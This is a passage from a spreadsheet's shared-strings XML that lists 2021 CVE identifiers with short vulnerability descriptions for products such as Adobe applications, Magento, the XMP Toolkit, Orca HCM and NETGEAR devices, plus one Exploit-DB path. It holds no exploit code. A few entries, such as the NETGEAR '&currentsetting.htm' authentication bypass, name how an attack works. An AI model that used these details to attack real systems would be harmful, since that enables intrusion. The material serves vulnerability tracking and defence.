    <t>An invalid pointer initialization issue was found in the SLiRP networking implementation of QEMU. The flaw exists in the tftp_input() function and could occur while processing a udp packet that is smaller than the size of the 'tftp_t' structure. This issue may lead to out-of-bounds read access or indirect host memory disclosure to the guest. The highest threat from this vulnerability is to data confidentiality. This flaw affects libslirp versions prior to 4.6.0.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/50080.txt</t>
  </si>
  <si>
    <t>AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>CVE-2021-35955</t>
  </si>
  <si>
    <t>Contao &gt;=4.0.0 allows backend XSS via HTML attributes to an HTML field. Fixed in 4.4.56, 4.9.18, 4.11.7.</t>
  </si>
  <si>
    <t>CVE-2021-35956</t>
  </si>
  <si>
    <t>Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.</t>
  </si>
  <si>
    <t>CVE-2021-35957</t>
  </si>
  <si>
    <t>Stormshield Endpoint Security Evolution 2.0.0 through 2.0.2 does not accomplish the intended defense against local administrators who can replace the Visual C++ runtime DLLs (in %WINDIR%\system32) with malicious ones.</t>
  </si>
  <si>
    <t>CVE-2021-35958</t>
  </si>
  <si>
    <t>** DISPUTED ** TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.</t>
  </si>
  <si>
    <t>CVE-2021-35959</t>
  </si>
  <si>
    <t>In Plone 5.0 through 5.2.4, Editors are vulnerable to XSS in the folder contents view, if a Contributor has created a folder with a SCRIPT tag in the description field.</t>
  </si>
  <si>
    <t>CVE-2021-3596</t>
  </si>
  <si>
    <t>A NULL pointer dereference flaw was found in ImageMagick in versions prior to 7.0.10-31 in ReadSVGImage() in coders/svg.c. This issue is due to not checking the return value from libxml2's xmlCreatePushParserCtxt() and uses the value directly, which leads to a crash and segmentation fault.</t>
  </si>
  <si>
    <t>CVE-2021-35961</t>
  </si>
  <si>
    <t>Dr. ID Door Access Control and Personnel Attendance Management system uses the hard-code admin default credentials that allows remote attackers to access the system through the default password and obtain the highest permission.</t>
  </si>
  <si>
    <t>CVE-2021-35962</t>
  </si>
  <si>
    <t>Specific page parameters in Dr. ID Door Access Control and Personnel Attendance Management system does not filter special characters. Remote attackers can apply Path Traversal means to download credential files from the system without permission.</t>
  </si>
  <si>
    <t>CVE-2021-35963</t>
  </si>
  <si>
    <t>The specific parameter of upload function of the Orca HCM digital learning platform does not filter file format, which allows remote unauthenticated attackers to upload files containing malicious script to execute RCE attacks.</t>
  </si>
  <si>
    <t>CVE-2021-35964</t>
  </si>
  <si>
    <t>The management page of the Orca HCM digital learning platform does not perform identity verification, which allows remote attackers to execute the management function without logging in, access members’ information, modify and delete the courses in system, thus causing users fail to access the learning content.</t>
  </si>
  <si>
    <t>CVE-2021-35965</t>
  </si>
  <si>
    <t>The Orca HCM digital learning platform uses a weak factory default administrator password, which is hard-coded in the source code of the webpage in plain text, thus remote attackers can obtain administrator’s privilege without logging in.</t>
  </si>
  <si>
    <t>CVE-2021-35966</t>
  </si>
  <si>
    <t>The specific function of the Orca HCM digital learning platform does not filter input parameters properly, which causing the URL can be redirected to any website. Remote attackers can use the vulnerability to execute phishing attacks.</t>
  </si>
  <si>
    <t>CVE-2021-35967</t>
  </si>
  <si>
    <t>The directory page parameter of the Orca HCM digital learning platform does not filter special characters. Remote attackers can access the system directory thru Path Traversal without logging in.</t>
  </si>
  <si>
    <t>CVE-2021-35968</t>
  </si>
  <si>
    <t>The directory list page parameter of the Orca HCM digital learning platform fails to filter special characters properly. Remote attackers can access the system directory thru Path Traversal with users’ privileges.</t>
  </si>
  <si>
    <t>CVE-2021-35969</t>
  </si>
  <si>
    <t>Pexip Infinity before 26 allows temporary remote Denial of Service (abort) because of missing call-setup input validation.</t>
  </si>
  <si>
    <t>CVE-2021-3597</t>
  </si>
  <si>
    <t>A flaw was found in undertow. The HTTP2SourceChannel fails to write the final frame under some circumstances, resulting in a denial of service. The highest threat from this vulnerability is availability. This flaw affects Undertow versions prior to 2.0.35.SP1, prior to 2.2.6.SP1, prior to 2.2.7.SP1, prior to 2.0.36.SP1, prior to 2.2.9.Final and prior to 2.0.39.Final.</t>
  </si>
  <si>
    <t>CVE-2021-35970</t>
  </si>
  <si>
    <t>Talk 4 in Coral before 4.12.1 allows remote attackers to discover e-mail addresses and other sensitive information via GraphQL because permission checks use an incorrect data type.</t>
  </si>
  <si>
    <t>CVE-2021-35971</t>
  </si>
  <si>
    <t>Veeam Backup and Replication 10 before 10.0.1.4854 P20210609 and 11 before 11.0.0.837 P20210507 mishandles deserialization during Microsoft .NET remoting.</t>
  </si>
  <si>
    <t>CVE-2021-35973</t>
  </si>
  <si>
    <t>NETGEAR WAC104 devices before 1.0.4.15 are affected by an authentication bypass vulnerability in /usr/sbin/mini_httpd, allowing an unauthenticated attacker to invoke any action by adding the &amp;currentsetting.htm substring to the HTTP query, a related issue to CVE-2020-27866. This directly allows the attacker to change the web UI password, and eventually to enable debug mode (telnetd) and gain a shell on the device as the admin limited-user account (however, escalation to root is simple because of weak permissions on the /etc/ directory).</t>
  </si>
  <si>
    <t>CVE-2021-35976</t>
  </si>
  <si>
    <t>The feature to preview a website in Plesk Obsidian 18.0.0 through 18.0.32 on Linux is vulnerable to reflected XSS via the /plesk-site-preview/ PATH, aka PFSI-62467. The attacker could execute JavaScript code in the victim's browser by using the link to preview sites hosted on the server. Authentication is not required to exploit the vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-35977</t>
  </si>
  <si>
    <t>An issue was discovered in Digi RealPort for Windows through 4.8.488.0. A buffer overflow exists in the handling of ADDP discovery response messages. This could result in arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-35978</t>
  </si>
  <si>
    <t>An issue was discovered in Digi TransPort DR64, SR44 VC74, and WR. The ZING protocol allows arbitrary remote command execution with SUPER privileges. This allows an attacker (with knowledge of the protocol) to execute arbitrary code on the controller including overwriting firmware, adding/removing users, disabling the internal firewall, etc.</t>
  </si>
  <si>
    <t>CVE-2021-35979</t>
  </si>
  <si>
    <t>An issue was discovered in Digi RealPort through 4.8.488.0. The 'encrypted' mode is vulnerable to man-in-the-middle attacks and does not perform authentication.</t>
  </si>
  <si>
    <t>CVE-2021-3598</t>
  </si>
  <si>
    <t>There's a flaw in OpenEXR's ImfDeepScanLineInputFile functionality in versions prior to 3.0.5. An attacker who is able to submit a crafted file to an application linked with OpenEXR could cause an out-of-bounds read. The greatest risk from this flaw is to application availability.</t>
  </si>
  <si>
    <t>CVE-2021-35981</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by an Use-after-free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35982</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20060 (and earlier), 2020.004.30006 (and earlier) and 2017.011.30199 (and earlier) are affected by an Uncontrolled Search Path Element vulnerability. A local attacker with non-administrative privileges can plant a malicious DLL to achieve arbitrary code execution in the context of the current user via DLL hijacking. Exploitation of this issue requires user interaction.</t>
  </si>
  <si>
    <t>CVE-2021-35983</t>
  </si>
  <si>
    <t>CVE-2021-35984</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by a Null pointer dereference vulnerability. An authenticated attacker could leverage this vulnerability achieve an application denial-of-service in the context of the current user. Exploitation of this issue does not requires user interaction.</t>
  </si>
  <si>
    <t>CVE-2021-35985</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by a Null pointer dereference vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35986</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by an Type Confusion vulnerability. An unauthenticated attacker could leverage this vulnerability to read arbitrary system information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35987</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by an out-of-bounds Read vulnerability. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35988</t>
  </si>
  <si>
    <t>Acrobat Reader DC versions 2021.005.20054 (and earlier), 2020.004.30005 (and earlier) and 2017.011.30197 (and earlier) are affected by an Out-of-bounds Read vulnerability. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35989</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.0.2 (and earlier) is affected by an Out-of-bounds Write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3599</t>
  </si>
  <si>
    <t>A potential vulnerability in the SMI callback function used to access flash device in some ThinkPad models may allow an attacker with local access and elevated privileges to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-35990</t>
  </si>
  <si>
    <t>CVE-2021-35991</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.0.2 (and earlier) is affected by an uninitialized variable vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35992</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.0.2 (and earlier) is affected by an Out-of-bounds Read vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose sensitive memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35993</t>
  </si>
  <si>
    <t>Adobe After Effects version 18.2.1 (and earlier) is affected by an out-of-bounds Write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35994</t>
  </si>
  <si>
    <t>CVE-2021-35995</t>
  </si>
  <si>
    <t>Adobe After Effects version 18.2.1 (and earlier) is affected by an Improper input validation vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-35996</t>
  </si>
  <si>
    <t>Adobe After Effects version 18.2.1 (and earlier) is affected by a memory corruption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35997</t>
  </si>
  <si>
    <t>Adobe Premiere Pro version 15.2 (and earlier) is affected by a memory corruption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35999</t>
  </si>
  <si>
    <t>Adobe Prelude version 10.0 (and earlier) is affected by a memory corruption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36000</t>
  </si>
  <si>
    <t>Adobe Character Animator version 4.2 (and earlier) is affected by a memory corruption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36001</t>
  </si>
  <si>
    <t>Adobe Character Animator version 4.2 (and earlier) is affected by an out-of-bounds Read vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36002</t>
  </si>
  <si>
    <t>Adobe Captivate version 11.5.5 (and earlier) is affected by an Creation of Temporary File In Directory With Incorrect Permissions vulnerability that could result in privilege escalation in the context of the current user. The attacker must plant a malicious file in a particular location of the victim's machine. Exploitation of this issue requires user interaction in that a victim must launch the Captivate Installer.</t>
  </si>
  <si>
    <t>CVE-2021-36003</t>
  </si>
  <si>
    <t>Adobe Audition version 14.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36004</t>
  </si>
  <si>
    <t>Adobe InDesign version 16.0 (and earlier) is affected by an Out-of-bounds Write vulnerability in the CoolType library. An unauthenticated attacker could leverage this vulnerability to achieve remote code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36005</t>
  </si>
  <si>
    <t>Adobe Photoshop versions 21.2.9 (and earlier) and 22.4.2 (and earlier) is affected by a stack overflow vulnerability due to insecure handling of a crafted PSD file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted PSD file in Photoshop.</t>
  </si>
  <si>
    <t>CVE-2021-36006</t>
  </si>
  <si>
    <t>Adobe Photoshop versions 21.2.9 (and earlier) and 22.4.2 (and earlier) are affected by an Improper input validation vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36007</t>
  </si>
  <si>
    <t>Adobe Prelude version 10.0 (and earlier) are affected by an uninitialized variable vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36008</t>
  </si>
  <si>
    <t>Adobe Illustrator version 25.2.3 (and earlier) is affected by an Use-after-free vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to read arbitrary file system information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36009</t>
  </si>
  <si>
    <t>Adobe Illustrator version 25.2.3 (and earlier) is affected by an memory corruption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36010</t>
  </si>
  <si>
    <t>Adobe Illustrator version 25.2.3 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36011</t>
  </si>
  <si>
    <t>Adobe Illustrator version 25.2.3 (and earlier) is affected by a potential Command injection vulnerability when chained with a development and debugging tool for JavaScript scripts. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36012</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by a business logic error in the placeOrder graphql mutation. An authenticated attacker can leverage this vulnerability to altar the price of an item.</t>
  </si>
  <si>
    <t>CVE-2021-36013</t>
  </si>
  <si>
    <t>Adobe Media Encoder version 15.2 (and earlier) is affected by an Out-of-bounds Read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36014</t>
  </si>
  <si>
    <t>Adobe Media Encoder version 15.2 (and earlier) is affected by an uninitialized pointer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to read arbitrary file system information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36015</t>
  </si>
  <si>
    <t>Adobe Media Encoder version 15.2 (and earlier) is affected by a memory corruption vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36016</t>
  </si>
  <si>
    <t>Adobe Media Encoder version 15.2 (and earlier) is affected by an Out-of-bounds Read vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to read arbitrary file system information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36017</t>
  </si>
  <si>
    <t>CVE-2021-36018</t>
  </si>
  <si>
    <t>Adobe After Effects version 18.2.1 (and earlier) is affected by an Out-of-bounds Read vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose sensitive memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36019</t>
  </si>
  <si>
    <t>Adobe After Effects version 18.2.1 (and earlier) is affected by an Out-of-bounds Read vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to disclose arbitrary memory information in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-3602</t>
  </si>
  <si>
    <t>An information disclosure flaw was found in Buildah, when building containers using chroot isolation. Running processes in container builds (e.g. Dockerfile RUN commands) can access environment variables from parent and grandparent processes. When run in a container in a CI/CD environment, environment variables may include sensitive information that was shared with the container in order to be used only by Buildah itself (e.g. container registry credentials).</t>
  </si>
  <si>
    <t>CVE-2021-36020</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an XML Injection vulnerability in the 'City' field. An unauthenticated attacker can trigger a specially crafted script to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36022</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an XML Injection vulnerability in the Widgets Update Layout. An attacker with admin privileges can trigger a specially crafted script to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36024</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an Improper Neutralization of Special Elements Used In A Command via the Data collection endpoint. An attacker with admin privileges can upload a specially crafted file to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36025</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability while saving a customer's details with a specially crafted file. An authenticated attacker with admin privileges can leverage this vulnerability to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36026</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by a stored cross-site scripting vulnerability in the customer address upload feature that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2021-36027</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by a stored cross-site scripting vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2021-36028</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an XML Injection vulnerability when saving a configurable product. An attacker with admin privileges can trigger a specially crafted script to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36029</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper improper authorization vulnerability. An attacker with admin privileges could leverage this vulnerability to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-3603</t>
  </si>
  <si>
    <t>PHPMailer 6.4.1 and earlier contain a vulnerability that can result in untrusted code being called (if such code is injected into the host project's scope by other means). If the $patternselect parameter to validateAddress() is set to 'php' (the default, defined by PHPMailer::$validator), and the global namespace contains a function called php, it will be called in preference to the built-in validator of the same name. Mitigated in PHPMailer 6.5.0 by denying the use of simple strings as validator function names.</t>
  </si>
  <si>
    <t>CVE-2021-36030</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability during the checkout process. An unauthenticated attacker can leverage this vulnerability to alter the price of items.</t>
  </si>
  <si>
    <t>CVE-2021-36031</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by a Path Traversal vulnerability via the `theme[preview_image]` parameter. An attacker with admin privileges could leverage this vulnerability to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36032</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability. An authenticated attacker can trigger an insecure direct object reference in the `V1/customers/me` endpoint to achieve information exposure and privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-36033</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an XML Injection vulnerability in the Widgets Module. An attacker with admin privileges can trigger a specially crafted script to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36034</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability. An attacker with admin privileges can upload a specially crafted file to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36035</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability. An attacker with admin privileges could make a crafted request to the Adobe Stock API to achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36037</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper improper authorization vulnerability. An authenticated attacker could leverage this vulnerability to achieve sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-36038</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability in the Multishipping Module. An authenticated attacker could leverage this vulnerability to achieve sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-36039</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability via the `quoteId` parameter. An attacker can abuse this vulnerability to disclose sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-3604</t>
  </si>
  <si>
    <t>Secure 8 (Evalos) does not validate user input data correctly, allowing a remote attacker to perform a Blind SQL Injection. An attacker could exploit this vulnerability in order to extract information of users and administrator accounts stored in the database.</t>
  </si>
  <si>
    <t>CVE-2021-36040</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability. An attacker with admin privileges can upload a specially crafted file to bypass file extension restrictions and could lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36041</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability. An attacker with admin privileges could upload a specially crafted file in the 'pub/media` directory could lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36042</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability in the API File Option Upload Extension. An attacker with Admin privileges can achieve unrestricted file upload which can result in remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-36043</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by a blind SSRF vulnerability in the bundled dotmailer extension. An attacker with admin privileges could abuse this to achieve remote code execution should Redis be enabled.</t>
  </si>
  <si>
    <t>CVE-2021-36044</t>
  </si>
  <si>
    <t>Magento Commerce versions 2.4.2 (and earlier), 2.4.2-p1 (and earlier) and 2.3.7 (and earlier) are affected by an improper input validation vulnerability. An unauthenticated attacker could abuse this vulnerability to cause a server-side denial-of-service using a GraphQL field.</t>
  </si>
  <si>
    <t>CVE-2021-36045</t>
  </si>
  <si>
    <t>XMP Toolkit SDK versions 2020.1 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of arbitrary memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36046</t>
  </si>
  <si>
    <t>XMP Toolkit version 2020.1 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-36047</t>
  </si>
  <si>
    <t>XMP Toolkit SDK version 2020.1 (and earlier) is affected by an Improper Input Validation vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-36048</t>
  </si>
  <si>
    <t>CVE-2021-36049</t>
  </si>
  <si>
    <t>Adobe Bridge version 11.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious Bridge file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-3605</t>
  </si>
  <si>
    <t>There's a flaw in OpenEXR's rleUncompress functionality in versions prior to 3.0.5. An attacker who is able to submit a crafted file to an application linked with OpenEXR could cause an out-of-bounds read. The greatest risk from this flaw is to application availability.</t>
  </si>
  <si>
    <t>CVE-2021-36050</t>
  </si>
  <si>
    <t>XMP Toolkit SDK version 2020.1 (and earlier) is affected by a buffer overflow vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-36051</t>
  </si>
  <si>
    <t>XMP Toolkit SDK version 2020.1 (and earlier) is affected by a buffer overflow vulnerability potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a specially-crafted .cpp file.</t>
  </si>
  <si>
    <t>CVE-2021-36052</t>
  </si>
  <si>
    <t>CVE-2021-36053</t>
  </si>
  <si>
    <t>CVE-2021-36054</t>
  </si>
  <si>
    <t>XMP Toolkit SDK version 2020.1 (and earlier) is affected by a buffer overflow vulnerability potentially resulting in local application denial of service in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-36055</t>
  </si>
  <si>
    <t>XMP Toolkit SDK versions 2020.1 (and earlier) are affected by a use-after-free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>CVE-2021-36056</t>
  </si>
  <si>
    <t>CVE-2021-36057</t>
  </si>
  <si>
    <t>XMP Toolkit SDK version 2020.1 (and earlier) is affected by a write-what-where condition vulnerability caused during the application's memory allocation process. This may cause the memory management functions to become mismatched resulting in local application denial of service in the context of the current user.</t>
  </si>
  <si>
    <t>CVE-2021-36058</t>
  </si>
  <si>
    <t>XMP Toolkit SDK version 2020.1 (and earlier) is affected by an Integer Overflow vulnerability potentially resulting in application-level denial of service in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-36059</t>
  </si>
  <si>
    <t>CVE-2021-3606</t>
  </si>
  <si>
    <t>OpenVPN before version 2.5.3 on Windows allows local users to load arbitrary dynamic loadable libraries via an OpenSSL configuration file if present, which allows the user to run arbitrary code with the same privilege level as the main OpenVPN process (openvpn.exe).</t>
  </si>
  <si>
    <t>CVE-2021-36061</t>
  </si>
  <si>
    <t>Adobe Connect version 11.2.2 (and earlier) is affected by a secure design principles violation vulnerability via the 'pbMode' parameter. An unauthenticated attacker could leverage this vulnerability to edit or delete recordings on the Connect environment. Exploitation of this issue requires user interaction in that a victim must publish a link of a Connect recording.</t>
  </si>
  <si>
    <t>657</t>
  </si>
  <si>
    <t>CVE-2021-36062</t>
  </si>
  <si>
    <t>Adobe Connect version 11.2.2 (and earlier) is affected by a Reflected Cross-site Scripting vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.</t>
  </si>
  <si>
    <t>CVE-2021-36063</t>
  </si>
  <si>
    <t>Adobe Connect version 11.2.2 (and earlier) is affected by a Reflected Cross-site Scripting vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.</t>
  </si>
  <si>
    <t>CVE-2021-36064</t>
  </si>
  <si>
    <t>XMP Toolkit version 2020.1 (and earlier) is affected by a Buffer Underflow vulnerability which could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
  </si>
  <si>
    <t>124</t>
  </si>
  <si>
    <t>CVE-2021-36065</t>
  </si>
  <si>
